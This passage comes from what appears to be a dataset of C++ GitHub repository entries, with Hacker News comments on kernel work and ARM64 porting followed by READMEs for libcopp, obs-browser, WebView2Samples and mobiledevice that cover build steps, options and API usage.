beginners. Choose the field you like and start lurking on their mailing lists; download the source code, try to understand it and ask questions (let developers on the mailing list know that you are a beginner and want to contribute, and ask what is the best approach to get to speed with the codebase)If I wanted to do Linux Kernel development, I'd apply at Red Hat. I've got a buddy who interviews newish kernel developers out of school for them - it doesn't sound like he's looking for anything super specific either - he's often dismayed at how new graduates he talks to aren't even up on source control or other things he considers fundamental. He's US based but the teams are international (though I don't know if they'd hire from any country; maybe just specific ones).Anyway, that's where I'd apply.M1 uses the ARM64[1] instruction set and a lot of compilers started working on ARM64 years ago so in many cases compilers were already ready before M1 was announced. Creating a macOS/ARM64 toolchain is mostly a combination of existing features from Linux/ARM64 and macOS/x86-64. For example, Linux uses ELF but macOS needs a Mach-O linker but most languages already had Mach-O support anyway. Once you have the toolchain it's a matter of recompiling and fixing any non-portable assumptions in the code. 
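\n\nA concrete instance of such a non-portable assumption, sketched in standard C++ with <atomic> (writer/reader are hypothetical names):\n\n int data = 0;\n std::atomic<bool> ready{false};\n\n void writer() {\n data = 42;\n ready.store(true, std::memory_order_release); // pairs with the acquire below\n }\n\n void reader() {\n while (!ready.load(std::memory_order_acquire)) {}\n assert(data == 42); // guaranteed by the acquire/release pair; with relaxed\n } // ordering this often still passes on x86-64 yet can fail on ARM64\n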
Fortunately x86-64 and ARM64 are both 64-bit little-endian so porting is fairly easy but the memory consistency models are different which can expose bugs in poorly-written code.[1] The official name is something else but it's dumb", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "owent/libcopp", "link": "https://github.com/owent/libcopp", "tags": ["boost", "coroutine", "cpp", "cross-platform", "performance", "c-plus-plus", "assembly", "await", "then", "timer", "stack", "pool", "thread-safety", "lock-free", "ha", "high-performance", "window", "linux", "macos"], "stars": 641, "description": "cross-platform coroutine library in c++", "lang": "C++", "repo_lang": "", "readme": "libcopp\n============\n\n.. _MIT LICENSE: https://github.com/owent/libcopp/blob/v2/LICENSE\n.. _`docs/libcopp.doxyfile.in`: https://github.com/owent/libcopp/blob/v2/docs/libcopp.doxyfile.in\n.. _`docs/sphinx`: https://github.com/owent/libcopp/blob/v2/docs/sphinx\n.. _cmake: https://cmake.org/\n.. _binutils: http://www.gnu.org/software/binutils/\n.. _llvm: http://llvm.org/\n.. _gtest: https://github.com/google/googletest\n.. _Boost.Test: (http://www.boost.org/doc/libs/release/libs/test\n.. _vcpkg: https://github.com/Microsoft/vcpkg\n\nCross-platform coroutine library in C++ .\n\n.. image:: https://img.shields.io/github/forks/owent/libcopp?style=social\n.. image:: https://img.shields.io/github/stars/owent/libcopp?style=social\n\n.. |release-badge| image:: https://img.shields.io/github/v/release/owent/libcopp\n :alt: Release\n :target: https://github.com/owent/libcopp/releases\n\n.. |code-size-badge| image:: https://img.shields.io/github/languages/code-size/owent/libcopp\n :alt: Code size\n :target: https://github.com/owent/libcopp\n\n.. |repo-size-badge| image:: https://img.shields.io/github/repo-size/owent/libcopp\n :alt: Repo size\n :target: https://github.com/owent/libcopp\n\n.. |forks-badge| image:: https://img.shields.io/github/forks/owent/libcopp?style=social\n :alt: Forks\n :target: https://github.com/owent/libcopp\n\n.. |stars-badge| image:: https://img.shields.io/github/stars/owent/libcopp?style=social\n :alt: Stars\n :target: https://github.com/owent/libcopp\n\n.. |ci-badge| image:: https://github.com/owent/libcopp/actions/workflows/main.yml/badge.svg\n :alt: CI build status\n :target: https://github.com/owent/libcopp/actions/workflows/main.yml\n\n.. |codecov-badge| image:: https://codecov.io/gh/owent/libcopp/branch/v2/graph/badge.svg\n :alt: Coveralls coverage\n :target: https://codecov.io/gh/owent/libcopp\n\n.. 
|lgtm-badge| image:: https://img.shields.io/lgtm/grade/cpp/g/owent/libcopp.svg?logo=lgtm&logoWidth=18\n :alt: Language grade: C/C++\n :target: https://lgtm.com/projects/g/owent/libcopp/context:cpp\n\n|release-badge| |code-size-badge| |repo-size-badge| |ci-badge| |codecov-badge| |lgtm-badge| |forks-badge| |stars-badge|\n\nCI Job Matrix\n----------------\n\n+---------------+--------------------+-----------------------+\n| Target System | Toolchain | Note |\n+===============+====================+=======================+\n| Linux | GCC | Static linking |\n+---------------+--------------------+-----------------------+\n| Linux | GCC | Dynamic linking |\n+---------------+--------------------+-----------------------+\n| Linux | GCC-latest | |\n+---------------+--------------------+-----------------------+\n| Linux | GCC-latest | No Exception |\n+---------------+--------------------+-----------------------+\n| Linux | GCC-latest | Thread Unsafe |\n+---------------+--------------------+-----------------------+\n| Linux | GCC 4.8 | Legacy |\n+---------------+--------------------+-----------------------+\n| Linux | Clang-latest | With libc++ |\n+---------------+--------------------+-----------------------+\n| MinGW64 | GCC | Dynamic linking |\n+---------------+--------------------+-----------------------+\n| Windows | Visual Studio 2019 | Static linking |\n+---------------+--------------------+-----------------------+\n| Windows | Visual Studio 2019 | Dynamic linking |\n+---------------+--------------------+-----------------------+\n| Windows | Visual Studio 2017 | Legacy,Static linking |\n+---------------+--------------------+-----------------------+\n| macOS | AppleClang | With libc++ |\n+---------------+--------------------+-----------------------+\n\nLICENSE\n------------\n\nLicensed under the `MIT LICENSE`_\n\nDocument\n------------\n\nDocuments can be found at https://libcopp.atframe.work and API references can be found at https://libcopp.atframe.work/doxygen/html/ (generated by sphinx and doxygen with `docs/sphinx`_ and `docs/libcopp.doxyfile.in`_).\n\n\nUPGRADE FROM 1.3.X-1.4.X to 2.X\n------------------------------------\n\n+ Add ``using value_type = int;`` into ``T`` when using ``cotask::task``.\n+ Rename ``stack_allocator_t`` to ``stack_allocator_type`` in ``T`` when using ``cotask::task``.\n+ Rename ``coroutine_t`` to ``coroutine_type`` in ``T`` when using ``cotask::task``.\n+ Rename ``libcopp::util::*`` to ``copp::util::``.\n+ We are not allowed to use ``libcopp::util::intrusive_ptr`` now; please use ``cotask::task::ptr_type`` instead.\n\nUPGRADE FROM 1.2.X to 1.3.X-1.4.X\n------------------------------------\n\n+ Rename ``cotask::task::await`` to ``cotask::task::await_task``.\n+ Replace ``cotask::task`` with ``cotask::task``; custom id allocators are no longer allowed.\n+ Replace ``cotask::core::standard_int_id_allocator`` with ``copp::util::uint64_id_allocator``; custom id allocators are no longer allowed.\n+ Require gcc 4.8+, MSVC 15+ (Visual Studio 2017).\n+ Require `cmake`_ 3.12.0 or higher.\n\nINSTALL\n------------\n\n| libcopp uses `cmake`_ to generate makefiles and to switch build tools.\n\nPrerequisites\n^^^^^^^^^^^^^^^^\n\n* **[required]** GCC or Clang or MSVC or clang-cl supporting ISO C++ 11 or higher\n* **[required]** `cmake`_ 3.16.0 or higher\n* **[optional]** `gtest`_ 1.6.0 or higher (better unit test support)\n* **[optional]** `Boost.Test`_ (Boost.Test support)\n\nUnix\n^^^^^^^^^^^^^^^^\n\n* **[required]** ``ar, as, ld`` (`binutils`_) or `llvm`_\n* **[optional]** if using
`gtest`_, pthread is required.\n\nWindows\n^^^^^^^^^^^^^^^^\n\n* **[required]** masm (in MSVC)\n* **[optional]** if using `gtest`_, pthread is required.\n\nInstall with vcpkg\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\n1. Clone and setup `vcpkg`_ (See more detail on https://github.com/Microsoft/vcpkg)\n .. code-block:: shell\n\n git clone https://github.com/Microsoft/vcpkg.git\n cd vcpkg\n PS> .\\bootstrap-vcpkg.bat\n Linux:~/$ ./bootstrap-vcpkg.sh\n\n2. Install libcopp\n .. code-block:: shell\n\n PS> .\\vcpkg install libcopp [--triplet x64-windows-static/x64-windows/x64-windows-static-md and etc...]\n Linux:~/$ ./vcpkg install libcopp\n\n3. See :ref:`using with cmake ` for cmake below.\n\nCustom Build\n^^^^^^^^^^^^^^^^\n\n1. Clone and make a build directory\n .. code-block:: shell\n\n git clone --single-branch --depth=1 -b master https://github.com/owent/libcopp.git \n mkdir libcopp/build && cd libcopp/build\n\n2. Run cmake command\n .. code-block:: shell\n\n # cmake [options...]\n cmake .. -DPROJECT_ENABLE_UNITTEST=YES -DPROJECT_ENABLE_SAMPLE=YES\n\n3. Make libcopp\n .. code-block:: shell\n\n cmake --build . --config RelWithDebInfo # or make [options] when using Makefile\n\n4. Run ``test/sample/benchmark`` *[optional]*\n .. code-block:: shell\n\n # Run test => Required: PROJECT_ENABLE_UNITTEST=YES\n ctest -VV . -C RelWithDebInfo -L libcopp.unit_test\n # Run sample => Required: PROJECT_ENABLE_SAMPLE=YES\n ctest -VV . -C RelWithDebInfo -L libcopp.sample\n # Run benchmark => Required: PROJECT_ENABLE_SAMPLE=YES\n ctest -VV . -C RelWithDebInfo -L libcopp.benchmark\n\n5. Install *[optional]*\n .. code-block:: shell\n\n cmake --build . --config RelWithDebInfo --target install # or make install when using Makefile\n\n6. Then just include and link ``libcopp.*/libcotask.*``, or see :ref:`using with cmake ` for cmake below.\n\nCMake Options\n----------------\n\nOptions can be passed to cmake, such as the compiler toolchain, the source directory, or libcopp-specific options that control build actions. libcopp options are listed below:\n\n+------------------------------------------+------------------------------------------------------------------------------------------------------------------------------+\n| Option | Description |\n+==========================================+==============================================================================================================================+\n| BUILD_SHARED_LIBS=YES|NO | [default=NO] Build dynamic library. |\n+------------------------------------------+------------------------------------------------------------------------------------------------------------------------------+\n| LIBCOPP_ENABLE_SEGMENTED_STACKS=YES|NO | [default=NO] Enable split stack supported context. (It's only available in Linux with gcc 4.7.0 or higher.) |\n+------------------------------------------+------------------------------------------------------------------------------------------------------------------------------+\n| LIBCOPP_ENABLE_VALGRIND=YES|NO | [default=YES] Enable valgrind supported context. |\n+------------------------------------------+------------------------------------------------------------------------------------------------------------------------------+\n| PROJECT_ENABLE_UNITTEST=YES|NO | [default=NO] Build unit test. |\n+------------------------------------------+------------------------------------------------------------------------------------------------------------------------------+\n| PROJECT_ENABLE_SAMPLE=YES|NO | [default=NO] Build samples. 
|\n+------------------------------------------+------------------------------------------------------------------------------------------------------------------------------+\n| LIBCOPP_LOCK_DISABLE_THIS_MT=YES|NO | [default=NO] Disable multi-thread support for ``copp::this_coroutine`` and ``cotask::this_task``. |\n+------------------------------------------+------------------------------------------------------------------------------------------------------------------------------+\n| LIBCOPP_DISABLE_ATOMIC_LOCK=YES|NO | [default=NO] Disable multi-thread support. |\n+------------------------------------------+------------------------------------------------------------------------------------------------------------------------------+\n| LIBCOTASK_ENABLE=YES|NO | [default=YES] Enable build libcotask. |\n+------------------------------------------+------------------------------------------------------------------------------------------------------------------------------+\n| LIBCOPP_FCONTEXT_USE_TSX=YES|NO | [default=YES] Enable `Intel Transactional Synchronisation Extensions (TSX) `_. |\n+------------------------------------------+------------------------------------------------------------------------------------------------------------------------------+\n| GTEST_ROOT=[path] | set gtest library install prefix path |\n+------------------------------------------+------------------------------------------------------------------------------------------------------------------------------+\n| BOOST_ROOT=[path] | set Boost.Test library install prefix path |\n+------------------------------------------+------------------------------------------------------------------------------------------------------------------------------+\n\nUSAGE\n------------\n\n.. _usage-using with-cmake:\n\nUsing with cmake\n^^^^^^^^^^^^^^^^\n\n1. Using ``set(Libcopp_ROOT )``\n2. Just using `find_package(Libcopp) `_ to use libcopp module.\n3. Example:(we assume the target name is stored in ``${CUSTOM_TARGET_NAME}``)\n\n.. code-block:: cmake\n\n find_package(Libcopp CONFIG REQUIRED)\n target_link_libraries(${CUSTOM_TARGET_NAME} libcopp::cotask)\n # Or just using copp by target_link_libraries(${CUSTOM_TARGET_NAME} libcopp::copp)\n\nIf using MSVC and vcpkg, CRT must match the triplet of vcpkg, these codes below may be helpful:\n\n.. code-block:: cmake\n\n if (MSVC AND VCPKG_TOOLCHAIN)\n if(DEFINED ENV{VCPKG_DEFAULT_TRIPLET} AND NOT DEFINED VCPKG_TARGET_TRIPLET)\n set(VCPKG_TARGET_TRIPLET \"$ENV{VCPKG_DEFAULT_TRIPLET}\" CACHE STRING \"\")\n endif()\n if (VCPKG_TARGET_TRIPLET MATCHES \"^.*windows-static$\")\n set(CMAKE_MSVC_RUNTIME_LIBRARY \"MultiThreaded$<$:Debug>\" CACHE STRING \"\")\n else ()\n set(CMAKE_MSVC_RUNTIME_LIBRARY \"MultiThreaded$<$:Debug>DLL\" CACHE STRING \"\")\n endif ()\n endif ()\n\nSee more detail on https://github.com/Microsoft/vcpkg/tree/master/ports/libcopp .\n\nDirectly use headers and libraries\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nJust include headers and linking library file of your platform to use libcopp.\n\n.. 
code-block:: shell\n\n LIBCOPP_PREFIX=\n\n # Example command for building samples with gcc 4.9 or higher on Linux\n for source in sample_readme_*.cpp; do\n g++ -std=c++14 -O2 -g -ggdb -Wall -Werror -fPIC -rdynamic -fdiagnostics-color=auto -Wno-unused-local-typedefs \\\n -I$LIBCOPP_PREFIX/include -L$LIBCOPP_PREFIX/lib64 -lcopp -lcotask $source -o $source.exe;\n done\n\n # Example command for building samples with clang 3.9 or higher and libc++ on Linux\n for source in sample_readme_*.cpp; do\n clang++ -std=c++17 -stdlib=libc++ -O2 -g -ggdb -Wall -Werror -fPIC -rdynamic \\\n -I$LIBCOPP_PREFIX/include -L$LIBCOPP_PREFIX/lib64 -lcopp -lcotask -lc++ -lc++abi \\\n $source -o $source.exe;\n done\n\n # AppleClang on macOS works just like the scripts above.\n # If you are using MinGW on Windows, it's better to add -static-libstdc++ -static-libgcc to\n # use static linking; the other scripts are just like those on Linux.\n\n\n.. code-block:: shell\n\n # Example command for building samples with MSVC 1914 or higher on Windows & powershell (Debug Mode /MDd)\n foreach ($source in Get-ChildItem -File -Name .\\sample_readme_*.cpp) {\n cl /nologo /MP /W4 /wd\"4100\" /wd\"4125\" /EHsc /std:c++17 /Zc:__cplusplus /O2 /MDd /I$LIBCOPP_PREFIX/include $LIBCOPP_PREFIX/lib64/copp.lib $LIBCOPP_PREFIX/lib64/cotask.lib $source\n }\n\n\nGet Started & Examples\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nThere are several samples showing how to use ``copp::coroutine_context``, ``copp::coroutine_context_fiber`` and ``cotask::task``:\n\n1. Using coroutine context\n2. Using coroutine task\n3. Using coroutine task manager\n4. Using stack pool\n5. Using ``task::then`` or ``task::await_task``\n6. Using ``copp::callable_promise`` of c++20 coroutine\n7. Using ``copp::generator_future`` for c++20 coroutine\n8. Custom error (timeout for example) when using c++20 coroutine\n9. Let c++20 coroutine work with ``cotask::task``\n10. Using Windows fiber and ``SetUnhandledExceptionFilter`` on Windows with ``cotask::task``\n\nAll sample code can be found in :ref:`EXAMPLES ` and `sample `_.\n\nNOTICE\n------------\n\nSplit stack support: if on Linux with gcc 4.7.0 or higher, add ``-DLIBCOPP_ENABLE_SEGMENTED_STACKS=YES`` to use the split stack supported context.\n\nIt's recommended to use the stack pool instead of gcc's split stacks.\n\nBENCHMARK\n------------\n\nPlease see the CI output for the latest benchmark report. Click to visit `Github Actions `_.\n\nFAQ\n------------\n\nQ: How to enable C++20 coroutines?\n\n| ANS: Add ``/std:c++latest /await`` for MSVC 1932 and below, ``-std=c++20 -fcoroutines-ts -stdlib=libc++`` for clang 13 and below, or ``-std=c++20 -fcoroutines`` for gcc 10.\n\nYou can just use ``-std=c++20 -stdlib=libc++`` for clang 14 or above, ``-std=c++20`` for gcc 11 or above, and ``/std:c++latest`` for MSVC 1932 or above.\n\nQ: Will libcopp handle exceptions?\n\n| ANS: When using C++11 or above, libcopp will catch all unhandled exceptions and rethrow them after the coroutine is resumed.\n\nQ: Why can ``SetUnhandledExceptionFilter`` not catch the unhandled exception in a coroutine?\n\n| ANS: ``SetUnhandledExceptionFilter`` only works with **Windows Fiber**; please see `sample/sample_readme_11.cpp `_ for details.\n
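\nFor readers new to C++20 coroutines, here is a minimal, library-agnostic sketch of the language feature those FAQ flags enable (plain standard C++ for illustration only; libcopp's own ``copp::generator_future`` and ``copp::callable_promise`` are richer, scheduler-aware equivalents):\n\n.. code-block:: cpp\n\n // Minimal C++20 generator coroutine (illustration only, not libcopp API).\n // Build with the FAQ flags above, e.g. g++ -std=c++20.\n #include <coroutine>\n #include <exception>\n #include <iostream>\n\n struct int_gen {\n struct promise_type {\n int value = 0;\n int_gen get_return_object() {\n return int_gen{std::coroutine_handle<promise_type>::from_promise(*this)};\n }\n std::suspend_always initial_suspend() { return {}; }\n std::suspend_always final_suspend() noexcept { return {}; }\n std::suspend_always yield_value(int v) { value = v; return {}; }\n void return_void() {}\n void unhandled_exception() { std::terminate(); }\n };\n\n explicit int_gen(std::coroutine_handle<promise_type> h) : handle(h) {}\n ~int_gen() { if (handle) handle.destroy(); }\n bool next() { handle.resume(); return !handle.done(); }\n\n std::coroutine_handle<promise_type> handle;\n };\n\n int_gen counter(int n) {\n for (int i = 0; i < n; ++i) co_yield i;\n }\n\n int main() {\n auto gen = counter(3);\n while (gen.next()) std::cout << gen.handle.promise().value << '\\n'; // prints 0 1 2\n }\n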
\nFEEDBACK\n------------\n\nIf you have any questions, please create an issue and provide the information of your environment, for example:\n\n+ **OS**: Windows 10 Pro 19041 *(This can be seen after running ``msinfo32``)* / Manjaro (Arch) Linux 5.4.39-1-MANJARO\n+ **Compiler**: Visual Studio 2019 C++ 16.5.5 with VS 2019 C++ v14.25 or MSVC 1925 / gcc 9.3.0\n+ **CMake Commands**: ``cmake .. -G \"Visual Studio 16 2019\" -A x64 -DLIBCOPP_FCONTEXT_USE_TSX=ON -DPROJECT_ENABLE_UNITTEST=ON -DPROJECT_ENABLE_SAMPLE=ON -DCMAKE_BUILD_TYPE=RelWithDebInfo -DCMAKE_INSTALL_PREFIX=%cd%/install-prefix`` / ``cmake .. -G Ninja -DLIBCOPP_FCONTEXT_USE_TSX=ON -DPROJECT_ENABLE_UNITTEST=ON -DPROJECT_ENABLE_SAMPLE=ON -DCMAKE_BUILD_TYPE=RelWithDebInfo -DCMAKE_INSTALL_PREFIX=/opt/libcopp``\n+ **Compile Commands**: ``cmake --build . -j``\n+ **Related Environment Variables**: Please provide all the environment variables which change the cmake toolchain, e.g. ``CC``, ``CXX``, ``AR``, etc.\n\nCONTRIBUTORS\n------------------------\n\n+ `owent `_\n\nTHANKS TO\n------------\n\n+ `mutouyun `_\n", "readme_type": "rst", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "matzman666/OpenVR-InputEmulator", "link": "https://github.com/matzman666/OpenVR-InputEmulator", "tags": [], "stars": 641, "description": "An OpenVR driver that allows to create virtual controllers, emulate controller input, manipulate poses of existing controllers and remap buttons. A client-side library that communicates with the driver via shared-memory is also included.", "lang": "C++", "repo_lang": "", "readme": "", "readme_type": "text", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "obsproject/obs-browser", "link": "https://github.com/obsproject/obs-browser", "tags": ["obs-studio", "cef", "c-plus-plus", "c"], "stars": 641, "description": "CEF-based OBS Studio browser plugin", "lang": "C++", "repo_lang": "", "readme": "# obs-browser\n\nobs-browser introduces a cross-platform Browser Source, powered by CEF ([Chromium Embedded Framework](https://bitbucket.org/chromiumembedded/cef/src/master/README.md)), to OBS Studio. A Browser Source allows the user to integrate web-based overlays into their scenes, with complete access to modern web APIs.\n\nAdditionally, obs-browser enables Service Integration (linking third party services) and Browser Docks (webpages loaded into the interface itself) on all supported platforms, except for Wayland (Linux).\n\n**This plugin is included by default** on official packages on Windows, macOS, the Ubuntu PPA and the official [Flatpak](https://flathub.org/apps/details/com.obsproject.Studio) (most Linux distributions).\n\n## JS Bindings\n\nobs-browser provides a global object that allows access to some OBS-specific functionality from JavaScript. 
This can be used to create an overlay that adapts dynamically to changes in OBS.\n\n### TypeScript Type Definitions\n\nIf you're using TypeScript, type definitions for the obs-browser bindings are available through npm and yarn.\n\n```sh\n# npm\nnpm install --save-dev @types/obs-studio\n\n# yarn\nyarn add --dev @types/obs-studio\n```\n\n### Get Browser Plugin Version\n\n```js\n/**\n * @returns {string} OBS Browser plugin version\n */\nwindow.obsstudio.pluginVersion\n// => 2.17.0\n```\n\n### Register for event callbacks\n\n```js\n/**\n * @callback EventListener\n * @param {CustomEvent} event\n */\n\n/**\n * @param {string} type\n * @param {EventListener} listener\n */\nwindow.addEventListener('obsSceneChanged', function(event) {\n\tvar t = document.createTextNode(event.detail.name)\n\tdocument.body.appendChild(t)\n})\n```\n\n#### Available events\n\nDescriptions for these events can be [found here](https://obsproject.com/docs/reference-frontend-api.html?highlight=paused#c.obs_frontend_event).\n\n* obsSceneChanged\n* obsSourceVisibleChanged\n* obsSourceActiveChanged\n* obsStreamingStarting\n* obsStreamingStarted\n* obsStreamingStopping\n* obsStreamingStopped\n* obsRecordingStarting\n* obsRecordingStarted\n* obsRecordingPaused\n* obsRecordingUnpaused\n* obsRecordingStopping\n* obsRecordingStopped\n* obsReplaybufferStarting\n* obsReplaybufferStarted\n* obsReplaybufferSaved\n* obsReplaybufferStopping\n* obsReplaybufferStopped\n* obsVirtualcamStarted\n* obsVirtualcamStopped\n* obsExit\n* [Any custom event emitted via obs-websocket vendor requests]\n\n\n### Control OBS\n#### Get webpage control permissions\nPermissions required: NONE\n```js\n/**\n * @typedef {number} Level - The level of permissions. 0 for NONE, 1 for READ_OBS (OBS data), 2 for READ_USER (User data), 3 for BASIC, 4 for ADVANCED and 5 for ALL\n */\n\n/**\n * @callback LevelCallback\n * @param {Level} level\n */\n\n/**\n * @param {LevelCallback} cb - The callback that receives the current control level.\n */\nwindow.obsstudio.getControlLevel(function (level) {\n console.log(level)\n})\n```\n\n#### Get OBS output status\nPermissions required: READ_OBS\n```js\n/**\n * @typedef {Object} Status\n * @property {boolean} recording - not affected by pause state\n * @property {boolean} recordingPaused\n * @property {boolean} streaming\n * @property {boolean} replaybuffer\n * @property {boolean} virtualcam\n */\n\n/**\n * @callback StatusCallback\n * @param {Status} status\n */\n\n/**\n * @param {StatusCallback} cb - The callback that receives the current output status of OBS.\n */\nwindow.obsstudio.getStatus(function (status) {\n\tconsole.log(status)\n})\n```\n\n#### Get the current scene\nPermissions required: READ_USER\n```js\n/**\n * @typedef {Object} Scene\n * @property {string} name - name of the scene\n * @property {number} width - width of the scene\n * @property {number} height - height of the scene\n */\n\n/**\n * @callback SceneCallback\n * @param {Scene} scene\n */\n\n/**\n * @param {SceneCallback} cb - The callback that receives the current scene in OBS.\n */\nwindow.obsstudio.getCurrentScene(function(scene) {\n console.log(scene)\n})\n```\n\n#### Get scenes\nPermissions required: READ_USER\n```js\n/**\n * @callback ScenesCallback\n * @param {string[]} scenes\n */\n\n/**\n * @param {ScenesCallback} cb - The callback that receives the scenes.\n */\nwindow.obsstudio.getScenes(function (scenes) {\n console.log(scenes)\n})\n```\n\n#### Get transitions\nPermissions required: READ_USER\n```js\n/**\n * @callback TransitionsCallback\n * 
@param {string[]} transitions\n */\n\n/**\n * @param {TransitionsCallback} cb - The callback that receives the transitions.\n */\nwindow.obsstudio.getTransitions(function (transitions) {\n console.log(transitions)\n})\n```\n\n#### Get current transition\nPermissions required: READ_USER\n```js\n/**\n * @callback TransitionCallback\n * @param {string} transition\n */\n\n/**\n * @param {TransitionCallback} cb - The callback that receives the transition currently set.\n */\nwindow.obsstudio.getCurrentTransition(function (transition) {\n console.log(transition)\n})\n```\n\n#### Save the Replay Buffer\nPermissions required: BASIC\n```js\n/**\n * Does not accept any parameters and does not return anything\n */\nwindow.obsstudio.saveReplayBuffer()\n```\n\n#### Start the Replay Buffer\nPermissions required: ADVANCED\n```js\n/**\n * Does not accept any parameters and does not return anything\n */\nwindow.obsstudio.startReplayBuffer()\n```\n\n#### Stop the Replay Buffer\nPermissions required: ADVANCED\n```js\n/**\n * Does not accept any parameters and does not return anything\n */\nwindow.obsstudio.stopReplayBuffer()\n```\n\n#### Change scene\nPermissions required: ADVANCED\n```js\n/**\n * @param {string} name - Name of the scene\n */\nwindow.obsstudio.setCurrentScene(name)\n```\n\n#### Set the current transition\nPermissions required: ADVANCED\n```js\n/**\n * @param {string} name - Name of the transition\n */\nwindow.obsstudio.setCurrentTransition(name)\n```\n\n#### Start streaming\nPermissions required: ALL\n```js\n/**\n * Does not accept any parameters and does not return anything\n */\nwindow.obsstudio.startStreaming()\n```\n\n#### Stop streaming\nPermissions required: ALL\n```js\n/**\n * Does not accept any parameters and does not return anything\n */\nwindow.obsstudio.stopStreaming()\n```\n\n#### Start recording\nPermissions required: ALL\n```js\n/**\n * Does not accept any parameters and does not return anything\n */\nwindow.obsstudio.startRecording()\n```\n\n#### Stop recording\nPermissions required: ALL\n```js\n/**\n * Does not accept any parameters and does not return anything\n */\nwindow.obsstudio.stopRecording()\n```\n\n#### Pause recording\nPermissions required: ALL\n```js\n/**\n * Does not accept any parameters and does not return anything\n */\nwindow.obsstudio.pauseRecording()\n```\n\n#### Unpause recording\nPermissions required: ALL\n```js\n/**\n * Does not accept any parameters and does not return anything\n */\nwindow.obsstudio.unpauseRecording()\n```\n\n#### Start the Virtual Camera\nPermissions required: ALL\n```js\n/**\n * Does not accept any parameters and does not return anything\n */\nwindow.obsstudio.startVirtualcam()\n```\n\n#### Stop the Virtual Camera\nPermissions required: ALL\n```js\n/**\n * Does not accept any parameters and does not return anything\n */\nwindow.obsstudio.stopVirtualcam()\n```\n\n\n### Register for visibility callbacks\n\n**This method is legacy. Register an event listener instead.**\n\n```js\n/**\n * onVisibilityChange gets callbacks when the visibility of the browser source changes in OBS\n *\n * @deprecated\n * @see obsSourceVisibleChanged\n * @param {boolean} visibility - True -> visible, False -> hidden\n */\nwindow.obsstudio.onVisibilityChange = function(visibility) {\n\n};\n```\n\n### Register for active/inactive callbacks\n\n**This method is legacy. 
Register an event listener instead.**\n\n```js\n/**\n * onActiveChange gets callbacks when the active/inactive state of the browser source changes in OBS\n *\n * @deprecated\n * @see obsSourceActiveChanged\n * @param {bool} True -> active, False -> inactive\n */\nwindow.obsstudio.onActiveChange = function(active) {\n\n};\n```\n\n### obs-websocket Vendor\nobs-browser includes integration with obs-websocket's Vendor requests. The vendor name to use is `obs-browser`, and available requests are:\n\n- `emit_event` - Takes `event_name` and ?`event_data` parameters. Emits a custom event to all browser sources. To subscribe to events, see [here](#register-for-event-callbacks)\n - See [#340](https://github.com/obsproject/obs-browser/pull/340) for example usage.\n\nThere are no available vendor events at this time.\n\n## Building\n\nOBS Browser cannot be built standalone. It is built as part of OBS Studio.\n\nBy following the instructions, this will enable Browser Source & Custom Browser Docks on all three platforms. Both `BUILD_BROWSER` and `CEF_ROOT_DIR` are required.\n\n### On Windows\n\nFollow the [build instructions](https://obsproject.com/wiki/Install-Instructions#windows-build-directions) and be sure to download the **CEF Wrapper** and set `CEF_ROOT_DIR` in CMake to point to the extracted wrapper.\n\n### On macOS\n\nUse the [macOS Full Build Script](https://obsproject.com/wiki/Install-Instructions#macos-build-directions). This will automatically download & enable OBS Browser.\n\n### On Linux\n\nFollow the [build instructions](https://obsproject.com/wiki/Install-Instructions#linux-build-directions) and choose the \"If building with browser source\" option. This includes steps to download/extract the CEF Wrapper, and set the required CMake variables.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "MicrosoftEdge/WebView2Samples", "link": "https://github.com/MicrosoftEdge/WebView2Samples", "tags": [], "stars": 641, "description": "Microsoft Edge WebView2 samples", "lang": "C++", "repo_lang": "", "readme": "# WebView2 Samples\n\nWelcome to the WebView2Samples repo. This repo contains several types of samples for [WebView2](https://learn.microsoft.com/microsoft-edge/webview2/):\n\n* Getting Started tutorial projects - Completed Visual Studio projects that result from following the steps in the [Getting Started tutorials](https://learn.microsoft.com/microsoft-edge/webview2/get-started/get-started). These are like Hello World basic apps.\n\n* Sample apps - WebView2 sample apps for various frameworks and platforms, as Visual Studio projects. These samples have menus and demonstrate various APIs. For more information, see [Sample apps](https://learn.microsoft.com/microsoft-edge/webview2/code-samples-links).\n\n* Deployment samples - Samples that demonstrate deploying the WebView2 Runtime. For more information, see [Deployment samples](https://learn.microsoft.com/microsoft-edge/webview2/samples/deployment-samples).\n\n\n## Contributing\n\nThis project welcomes contributions and suggestions. Most contributions require you to agree to a\nContributor License Agreement (CLA) declaring that you have the right to, and actually do, grant us\nthe rights to use your contribution. For details, visit https://cla.opensource.microsoft.com.\n\nWhen you submit a pull request, a CLA bot will automatically determine whether you need to provide\na CLA and decorate the PR appropriately (e.g., status check, comment). 
Simply follow the instructions\nprovided by the bot. You will only need to do this once across all repos using our CLA.\n\nThis project has adopted the [Microsoft Open Source Code of Conduct](https://opensource.microsoft.com/codeofconduct/).\nFor more information see the [Code of Conduct FAQ](https://opensource.microsoft.com/codeofconduct/faq/) or\ncontact [opencode@microsoft.com](mailto:opencode@microsoft.com) with any additional questions or comments.\n\n\n## Trademarks\n\nThis project may contain trademarks or logos for projects, products, or services. Authorized use of Microsoft \ntrademarks or logos is subject to and must follow \n[Microsoft Trademark and Brand Guidelines](https://www.microsoft.com/en-us/legal/intellectualproperty/trademarks/usage/general).\nUse of Microsoft trademarks or logos in modified versions of this project must not cause confusion or imply Microsoft sponsorship.\nAny use of third-party trademarks or logos is subject to those third parties' policies.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "imkira/mobiledevice", "link": "https://github.com/imkira/mobiledevice", "tags": [], "stars": 640, "description": "Command line utility for interacting with Apple's Private (Closed) Mobile Device Framework", "lang": "C++", "repo_lang": "", "readme": "[To the mobiledevice project page](https://github.com/imkira/mobiledevice)\n\nmobiledevice\n============\n\n[![Build Status](https://travis-ci.org/imkira/mobiledevice.png)](https://travis-ci.org/imkira/mobiledevice)\n\nmobiledevice is a command line tool for interacting with Apple's Mobile Device framework.\nIt can install and uninstall apps from the command line without relying on Xcode or iTunes, so that kind of work can be automated.\nNo 